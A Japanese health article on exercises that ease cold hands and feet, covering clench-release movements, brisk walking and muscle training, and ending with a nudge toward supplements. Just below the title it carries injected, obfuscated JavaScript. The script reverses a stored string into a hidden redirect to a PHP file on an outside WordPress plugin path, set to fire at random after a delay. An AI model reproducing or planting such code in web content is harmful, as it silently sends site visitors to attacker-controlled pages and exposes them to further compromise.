冷え性改善に効果的な運動方法

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}top”>冷え性改善に効果的な運動方法

冷え性の改善には、運動も1つの効果的な対策になります。

ここでは、「すぐに冷えた手足を温めたい!」という場合の即効性がある方法と、
冷え性自体を治したい!」という場合の長期的に効果がある方法をご紹介したいと思います。

手足をすぐに温める方法

手先、足先が冷えて辛い!という時に、すぐに改善できる運動です。

・手のグーパー運動

一番簡単に、手先の血行を良くする方法です。
グーの時は親指を握り込み、パーの時はできる限り
指をピンと伸ばします。これを手先が温まるまで繰り返します。

・足のグーパー運動

膝を伸ばして床に座り、つま先を天井に向けます。
そのまま足の指をグーパーと動かします。
これを足先が温まるまで繰り返します。

冷え性を根本的に改善する運動

冷え性を根本から改善するためには、以下のような運動が効果的です。

・ウォーキング

冷え性の改善に最も効果的なのは、血行を良くすることです。
血行を良くするためには、有酸素運動(息を止めずにする運動)が
良いと言われており、その代表がウォーキングです。

以下の点に注意してウォーキングをすることで、
血行を良くする効果が期待できます。

背筋を伸ばし、良い姿勢を意識する
つま先を上げ、かかとから着地する
いつもより大きな歩幅、早足を意識する

最初はこれだけを意識してウォーキングをすればOKです。
毎日ウォーキングの時間を取れればそれにこしたことはありませんが、
普段の歩き方を上記のように変えるだけでも効果が期待できます。

筋トレも効果的!

運動不足で筋肉が減少すると、冷え性を悪化させる原因になります。
体の熱は6割も筋肉で作られており、筋肉は体温のコントロールに
大きく関わっているため、筋肉量が少ないと体温調整の機能が低下してしまうのです。

また、筋肉は血液を循環させるポンプとしての役割も持っているため、
血行を良くするためにも筋肉は非常に重要となります。

とはいえ、日々筋トレを続けるのは難しいものですよね。
当然ですが、筋肉が少ない人が全員冷え性というわけではありません。

筋肉が少なくても血行が良い体質であれば冷え性にはなりませんので、
毎日の運動が難しいという方は、サプリメントなどで体質自体を
改善していく方法が良いでしょう。